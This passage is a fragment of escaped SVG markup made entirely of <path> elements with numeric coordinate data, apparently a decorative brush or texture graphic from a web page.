d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path 